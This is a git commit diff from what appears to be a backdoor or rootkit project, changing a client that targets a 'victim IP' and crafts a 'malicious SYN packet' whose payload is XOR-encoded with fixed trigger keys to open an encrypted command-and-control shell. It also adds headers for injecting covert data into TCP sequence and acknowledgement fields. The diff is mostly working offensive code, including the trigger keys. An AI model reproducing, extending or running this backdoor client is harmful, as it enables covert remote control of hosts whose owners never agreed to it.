Included new version of custom lib. Added checks for backdoor triggering

2026-01-14 03:33:07 +08:00 · 2022-05-04 04:40:25 -04:00
parent 25ef3acc5a
commit 073a911f74
21 changed files with 1799 additions and 2124 deletions
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -12,6 +12,7 @@

 #include "../common/constants.h"
 #include "../common/c&c.h"
+#include "../common/protocol.h"

 // For printing with colors
 #define KGRN  "\x1B[32m"
@@ -21,12 +22,6 @@
 #define KRED  "\x1B[31m" 
 #define RESET "\x1B[0m"

-//For encrypted shell
-#define SYN_PACKET_PAYLOAD_LEN 0x10
-#define SYN_PACKET_KEY_1 "\x56\xA4"
-#define SYN_PACKET_KEY_2 "\x78\x13"
-#define SYN_PACKET_KEY_3 "\x1F\x29"
-#define SYN_PACKET_SECTION_LEN 0x02

 void print_welcome_message(){
    printf("*******************************************************\n");
@@ -198,37 +193,38 @@ void activate_command_control_shell_encrypted(char* argv){
    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
    check_ip_address_format(argv);
    printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");
-    char* payload = malloc(SYN_PACKET_PAYLOAD_LEN);
+    //+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload
+    char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1];
    srand(time(NULL));
-    for(int ii=0; ii<SYN_PACKET_PAYLOAD_LEN; ii++){
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){
        payload[ii] = (char)rand();
    }
    //Follow protocol rules
-    char section[SYN_PACKET_SECTION_LEN];
-    char section2[SYN_PACKET_SECTION_LEN];
-    char key1[SYN_PACKET_SECTION_LEN] = SYN_PACKET_KEY_1;
-    char key2[SYN_PACKET_SECTION_LEN] = SYN_PACKET_KEY_2;
-    char key3[SYN_PACKET_SECTION_LEN] = SYN_PACKET_KEY_3;
-    char result[SYN_PACKET_SECTION_LEN];
-    strncpy(section, payload, SYN_PACKET_SECTION_LEN);
-    for(int ii=0; ii<SYN_PACKET_SECTION_LEN; ii++){
+    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
+    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3;
+    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
        result[ii] = section[ii] ^ key1[ii];
    }
-    strncpy(payload+0x06, result, SYN_PACKET_SECTION_LEN);
+    strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);

-    strncpy(section, payload+0x02, SYN_PACKET_SECTION_LEN);
-    for(int ii=0; ii<SYN_PACKET_SECTION_LEN; ii++){
+    strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
        result[ii] = section[ii] ^ key2[ii];
    }
-    strncpy(payload+0x0A, result, SYN_PACKET_SECTION_LEN);
+    strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);

-    strncpy(section, payload+0x06, SYN_PACKET_SECTION_LEN);
-    strncpy(section2, payload+0x0A, SYN_PACKET_SECTION_LEN);
-    for(int ii=0; ii<SYN_PACKET_SECTION_LEN; ii++){
+    strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
        result[ii] = section[ii] ^ section2[ii] ^ key2[ii];
    }

-    strncpy(payload+0x0D, result, SYN_PACKET_SECTION_LEN);
+    strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    
    
    packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
@@ -270,7 +266,6 @@ void activate_command_control_shell_encrypted(char* argv){
        printf("["KGRN"RESPONSE"RESET"] %s\n", res);   
    }
    
-    free(local_ip);
 }


--- a/src/client/client.o
+++ b/src/client/client.o
--- a/src/client/injector
+++ b/src/client/injector
--- a/src/client/lib/RawTCP.h
+++ b/src/client/lib/RawTCP.h
@@ -3,7 +3,7 @@

 #include <stdlib.h>

-//Packet_t structure
+//Packet_t and stream_t structures
 typedef struct packet_t{
    struct iphdr *ipheader;
    struct tcphdr *tcpheader;
@@ -12,6 +12,16 @@ typedef struct packet_t{
    char* packet;
 }packet_t;

+typedef struct stream_t{
+    packet_t* packet_stream;
+    int stream_length;
+}stream_t;
+
+typedef enum{
+    TYPE_TCP_SEQ_RAW,
+    TYPE_TCP_ACK_RAW
+}stream_inject_type_t;
+
 //PacketForger headers
 packet_t build_standard_packet(
    u_int16_t source_port,
@@ -22,10 +32,24 @@ packet_t build_standard_packet(
    char* payload
    );

+stream_t build_standard_packet_stream_empty_payload(
+    int stream_length,
+    u_int16_t source_port,
+    u_int16_t destination_port,
+    const char* source_ip_address,
+    const char* destination_ip_address
+    );
+
+stream_t stream_inject(stream_t stream, stream_inject_type_t type, char* payload, int payload_length);
+
 int packet_destroy(packet_t packet);

+void stream_destroy(stream_t stream);
+
 int set_TCP_flags(packet_t packet, int hex_flags);

+int set_TCP_seq_num(packet_t packet, u_int32_t bytes);
+
 //SocketManager headers
 int rawsocket_send(packet_t packet);

--- a/src/client/lib/libRawTCP_Lib.a
+++ b/src/client/lib/libRawTCP_Lib.a